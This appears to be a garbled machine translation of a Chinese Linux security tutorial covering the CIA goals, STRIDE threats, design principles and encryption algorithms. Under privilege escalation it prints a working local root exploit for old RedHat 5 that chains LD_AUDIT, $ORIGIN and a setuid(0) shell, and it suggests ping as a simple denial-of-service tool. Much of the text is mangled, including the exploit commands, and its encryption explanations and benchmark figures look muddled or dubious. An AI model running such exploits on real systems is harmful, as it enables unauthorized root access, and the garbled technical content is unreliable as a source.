Linux operating system security - encryption and security
Author: Yin Zhengjie
Copyright: original works, declined to reprint! Otherwise held liable.
A. Murphy's Law
Murphy's Law:
A psychological effect, by Edward Murphy (Edward A. Murphy) proposed the original words: If there are two or more ways to do something, of which a selection method will lead to disaster, it will be those who will make that choice.
main content:
Nothing is ever as it seems simple
All the things you will be longer than the expected time
Something wrong will go wrong will go wrong
If you are worried about a situation occurs, then it is more likely to occur
II. Security Mechanism
1> Information security goals
Confidentiality (Confidentiality):
data can not leak, such as the company's payroll is not leaking.
Integrity (Integrity):
To ensure that the data is complete, that is not to turn over.
Usability (Usability):
such as RAID5, when a hard disk is damaged, still normal use.
Controllability (Controlability):
such as the largest cluster of concurrent processing connection request is 100,000, but at some point you need to handle one million cluster when a connection request you have to be able to control these links, if you only deal with strengths 100,000 cluster connection request to respond to one million connection requests, a cluster might instantly collapsed, can take downgrade, measures such as the use of queues, batches processed 100,000 requests per treatment, 10 minutes to complete the process. If you can not effectively control these requests can cause a cluster crash.
Repudiation (Non -repudiation):
for example, you buy one item in a treasure or a network east, when the courier delivered to your door that you can not refuse to say it is not your thing Yeah, you are, after all, dig over the money.
2> security link
Physical security:
a variety of devices / host, room environment, for example, we can easily crack the linux root password.
System Security:
the host operating system or device, such as an operating system root password security to prohibit unauthorized users connected to the operating system.
Application Security:
a variety of network services, applications, such as control of user login, upload, download and other privileges.
Network security:
network access control, firewall rules, such as sshd service only certain users or ip access.
Data Security:
Backup and recovery information, encryption and decryption, such as the user's password stored in the database should not be used to encrypt the plaintext, early CSDN database events surely we all know it, CSDN known as China's largest development site, the result is stored username the password is stored in plain text mode, which results in the database who has authority, and anyone can get the password for the whole of China for all developers. Although now it fixes this problem, the site leads to a lot of bad data security developers do not bother to use.
Security Management:
a variety of affordable norms, processes, methods, such as after a number of important print data file you want to require the use of a shredder processing waste to cleaning aunt to clean.
III. Security attacks (STRIDE)
Counterfeit (Spoofing):
For example, there are loopholes in the mailbox, then you may want to impersonate the identity of whoever is who to send the message.
Tampering (Tampering):
For example, Hu Ge drama starring << >> myth, Zhao Gao tampering with the emperor's edict, ultimately did not pass the throne son Fusu, but passed to Hu Hai.
Denied (Repudiation):
In this case too normal production environment, obviously a developer command execution error led to the collapse of online services, but also good luck peacekeeping personnel fortress machine recording command executed by the user, with evidence of who did it.
Information leakage (Information Discloure):
such as the famous telnet service to transmit data in clear text, if you use telnet login protocol, user names and passwords can be use to crawl packet capture tool, such as the http protocol, data is transmitted in clear text user page use a password catch a prospective, such as in a lot of free Wi-Fi, as long as you will go through each other's routing gateway free Wi-Fi data transmission of all data streams, if there is to be grateful message directly to a crawl, as a staff to protect their privacy or have a sense of.
Denial of Service (Denial of Service):
You can use the ping command to launch a simple attack, resulting in normal service can not provide a response to the client, resulting in a state of denial of service, in this way suggest that you use ping police tactics.
Elevated privileges (Elevation of Privilege):
such as the early RedHat5 operating system has a flaw, as long as the gcc package is installed, if a general account until you can put it prompts the user to root privileges.
The first step, gcc installation kit: yum -y install gcc The second step, using the current user (yinzhengjie) mention the right operation performed: mkdir / tmp / yinzhengjie LN / bin / the ping / tmp / yinzhengjie / the Test exec 3 < /tmp/yinzhengjie/test rm -rf /tmp/yinzhengjie cat > /tmp/yinzhengjie.c <<EOF void __attribute__((constructor)) init() { setuid(0); system("/bin/bash"); } EOF GCC - W -fPIC -shared -o / tmp / yinzhengjie / tmp / yinzhengjie.c LD_AUDIT="$ORIGIN" exec /proc/self/fd/3 &> /dev/null
IV. The basic principles of safety design
The use of sophisticated security system:
Do When mice, for example, in 2019 just released CentOS 8.x version does not recommend the use directly in the production environment. Public comment up on the year (a bug changed version), 185 days after the results are automatically reboot the server with CentOS 6.2. The company estimated that thousands of servers after another restart the server, which means that the company would cause serious damage.
To input data of the suspicious mind:
to take into account the data entered by the user will not necessarily be very standardized.
The external system is not safe:
the external system mainly refers to the storm drain on public services, such as Ali, there will be tens of millions of attacks every day, so basically there will be an external firewall. In fact, less secure internal network also said 80% of attacks come from within the network caused. Until we have outside the network firewall protection, in fact, the network also has similar software firewalls such as waterproof wall.
Minimum authorized:
try to develop, test access to the minimum, as long as enough to meet the requirements.
Reducing the external interface:
to minimize the passage and the external connection, such as a USB port.
Use the default security mode:
for example, to make use of selinux, but the use of the software is relatively small in the country.
Security is not plausible:
need some technical means to ensure, for example port isolation of network devices, can communicate with each other, whether you need to configure firewall policy between the vlan, whether selinux need to open, if need permission to verify the application layer software, and so on.
Reflections from STRIDE:
STRIDE relevant Policy Reference Title 3 mentioned.
At the entrance examination:
at the entrance of the proper safety checks to ensure that the column is not blacklisted, then you can consider continuing to respond to the request.
Protect your system from the management:
Not only refers to technology, as well as management processes.
V. Security Algorithm
Common security technologies (security technology will involve the appropriate algorithm to ensure)
Certification:
authenticate users.
Authorization:
After verifying identity, you need to be licensed to the user.
Audit:
records the user's operation until each user what commands to facilitate the implementation of the Responsibility.
Secure communications:
data communication process, we need to be encrypted, such as https, ssh and other agreements.
Protocol encryption algorithm and
a symmetric encryption
Public key cryptography (also called: "Asymmetric Encryption Algorithm")
one-way encryption
authentication protocol
Tips:
encryption algorithm involving secret key, wherein the algorithm is public, the secret key is not disclosed.
VI. Symmetric encryption algorithm
Symmetric encryption (encryption and decryption using the same key), commercially popular symmetric encryption algorithm is as follows: The DES:
the Data Encryption Standard, 56bits (i.e., based on the Data Encryption Standard seven bytes) 3DES:
repeated three times on the basis of DES encryption on. The AES:
Advanced Ebcryption Standard, which supports 128bits (16 bytes of data encryption standard), 192bits (24 bytes of data encryption standard), 256bits (Data Encryption Standard 32 bytes) Commercial encryption algorithms: Blowfish, Twofish Other encryption algorithms: IDEA, RC6, CAST5 characteristic: ( 1 ) Encryption, decryption using the same key, high efficiency ( 2 ) the original data is divided into fixed-size blocks, one by encrypting defect: ( 1 ) Key excessive ( 2 ) Key Distribution ( 3 ) Data source could not be confirmed
VII. Asymmetric encryption algorithm
Public key encryption (key in pairs):
a public key:
open to everyone; public key
private key:
their own retained, must ensure that their privacy; secret key,
such as the company's finance department to use U shield is private, but to lose the way U shield will be encrypted using a symmetric secret key, which is why you need to enter a password when using the U shield finance staff, if the password is forgotten it can only go to the bank again to reset your password.
For example, after the digital certificate private key is used to encrypt data in transit, only the public key can decrypt the encrypted data.
Features:
encrypted with the public data is decrypted only using the private key paired; and vice versa (i.e., data encrypted using a private key using the public key can only be paired decrypting)
Function:
Digital Signature:
The main is to allow the recipient to confirm the identity of the sender
Symmetric key exchange:
After the sending of each other with a public key encryption symmetric key to the counterpart
data encryption:
for smaller data encryption
disadvantages:
a key length, encryption and decryption inefficient
algorithm:
RSA (supports encryption, digital signature, its wider application)
DSA (only support digital signatures)
ELGamal
Eight.
According to some statistics:
Using the DES algorithm (symmetric encryption)
Data encryption 1G, 2G becomes encrypted data, encrypted over 4 minutes, 8 minutes decryption.
Using the RSA algorithm (asymmetric encryption)
1G encrypted data, the encrypted file has not been the same size 1G, 1 min encryption, decryption time 64 hours.
nine.